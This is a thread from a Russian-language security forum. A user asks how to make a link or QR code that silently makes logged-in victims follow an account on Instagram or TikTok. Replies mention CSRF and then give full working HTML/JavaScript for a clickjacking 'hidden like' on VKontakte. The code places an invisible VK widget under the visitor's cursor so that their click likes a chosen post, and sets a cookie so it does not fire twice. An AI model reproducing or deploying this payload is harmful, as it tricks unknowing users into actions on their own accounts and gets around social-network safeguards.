• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Подписка в Instagramm без вашего участия

MrUsername

Green Team
05.12.2020
38
1
BIT
0
На днях пришла такая идея. У всех на телефонах установлены ТТ, инста, ФБ или ВК. Можно ли создать ссылку, QR code или еще что нибудь в этом духе, при нажатии на которую ты автоматически подпишешься на человека в инсте или в ТТ? На телефоне жертвы по любому установлены соц. сети и человек полюбому в них уже авторизирован. Причем сделать этот фокус так, чтобы телефон жертвы ничего на экране не показывал, но сразу подписывался. На сколько технически сложно воплатить такую задумку в жизнь? Основываясь на вашем личном профыесиональном опыте с чего вообще стоит начать писать такую программу-ссылку?
 
T

to_0day

Странный вопрос на ИБ форуме. Можно, но нужно знать полный URL, что производит подписку на человека. Могу предоставить свой софт для генерации QR кодов из ссылки
 

pp11

Green Team
16.09.2018
201
82
BIT
0
Можно, но не знаю работает ли такое с приложениями, скорее всего нет.
Узнайте, что такое "Межсайтовая подделка запроса" (CSRF).
 

MrUsername

Green Team
05.12.2020
38
1
BIT
0
Можно, но не знаю работает ли такое с приложениями, скорее всего нет.
Узнайте, что такое "Межсайтовая подделка запроса" (CSRF).
Спасибо, сегодня ознакомлюсь

Странный вопрос на ИБ форуме. Можно, но нужно знать полный URL, что производит подписку на человека. Могу предоставить свой софт для генерации QR кодов из ссылки
Пока я еще не опытный, чуть больше опыта наберусь и попрошу софт. Спасибо
 

Andhacker

Green Team
25.04.2017
125
32
BIT
1
Одно время пользовались популярностью скрипты автоподписки в VK, FB, OK, Youtube, Mail.ru + скрытые лайки.
Если пользователь открывал какой-нибудь сайт и если у него был включен JavaScript, то он автоматически вступал в какую-нибудь группу или подписывался на кого-нибудь)
 

MrUsername

Green Team
05.12.2020
38
1
BIT
0
Одно время пользовались популярностью скрипты автоподписки в VK, FB, OK, Youtube, Mail.ru + скрытые лайки.
Если пользователь открывал какой-нибудь сайт и если у него был включен JavaScript, то он автоматически вступал в какую-нибудь группу или подписывался на кого-нибудь)
Не в курсе как технически это было реализовано?
 

Andhacker

Green Team
25.04.2017
125
32
BIT
1
Не в курсе как технически это было реализовано?
Пример скрытого лайка на запись (раньше работало)
HTML:
<html><body>

<!-- При вставке на страницу - удалить теги выше
<div id="podpiska" style="z-index: 99999; cursor: default !important; display: none; opacity: 0; filter: alpha(Opacity=0); position: absolute; overflow: hidden; height: 20px !important; max-height: 20px !important; width: 30px !important; max-width: 30px !important;"><input autofocus type="text" id="blur1" onblur="clickit();" onclick="clickit();" style="height: 21px !important; cursor: default !important; width: 100% !important;">
<!--
// На любой записи в Контакте нажимаем кнопку Поделиться.
// Копируем код для вставки со вкладки Экспортировать и вставляем, как в примере ниже.
// В этом коде нужно заменить в 2 местах № поста (например, vk_post_49364608_2364) на vk_post
// Получится:
-->
<div id="vk_post"></div>
<script type="text/javascript"> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//vk.com/js/api/openapi.js?116"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'vk_openapi_js')); (function() { if (!window.VK || !VK.Widgets || !VK.Widgets.Post || !VK.Widgets.Post("vk_post", 49364608, 2364, 'R9wKR7ieBIGk7yraVcYJjxQEJVk', {width: 100, height: 100})) setTimeout(arguments.callee, 500); }());</script>
</div>
<script type="text/javascript"><!--
//Функция для установки куки. Не трогаем.
function SetCookie2(id, days){
var ws=new Date();
ws.setDate((days-0+ws.getDate()));
document.cookie=id+"; path=/; expires="+ws.toGMTString();
}
// Если есть куки vkgr2=off - скрипт не вызывается. Можете изменить для отладки.
if(document.cookie.indexOf("vkgr2=off") == -1) {
// Функция передвижения кнопки за курсором.
function mv(event){
//Ширина и высота документа. Чтобы кнопка не делала прокрутку, вычитаем несколько пикселей
//var hei = document.getElementsByTagName("body")[0].offsetHeight-13;
var wi = document.getElementsByTagName("body")[0].offsetWidth-15;
//Координаты курсора. Вычитаем пиксели, чтобы курсор был на кнопке.
var e = event || window.event;
var xx1 = (e.pageX || e.clientX + document.documentElement.scrollLeft)-10;
var yy1 = (e.pageY || e.clientY + document.documentElement.scrollTop)-5;
if (xx1>wi) {xx1=wi;}
//if (yy1>hei) {yy1=hei;}
document.getElementById('podpiska').style.left=xx1+'px';
document.getElementById('podpiska').style.top=yy1+'px';
//Прокрутка нашего виджета к кнопке подписки, тут важна точность. Но можно и к репосту прокрутить
document.getElementById('podpiska').scrollTop=document.getElementById('vk_post').offsetHeight-15;
document.getElementById('podpiska').scrollLeft=document.getElementById('vk_post').offsetWidth-50;
}
//Функции для автозапуска скрипта
document.onmousemove = mv;
document.onscroll = mv;
document.getElementById('podpiska').style.display='';
//Фокус на дополнительном элементе. При его потере - считаем скрипт сработавшим, так как body.onblur не везде работает.
setTimeout("document.getElementById('blur1').focus();", 900);
//Если пользователь кликнул на фрейме или ушел со страницы, то закрываем окно и ставим куку на 365 дней
function clickit(){
setTimeout("document.getElementById('podpiska').style.display='none'; SetCookie2('vkgr2=off', 365);", 1000);
}
}
//--></script>
<!-- При вставке на страницу- удалить что ниже -->
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
</body></html>
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!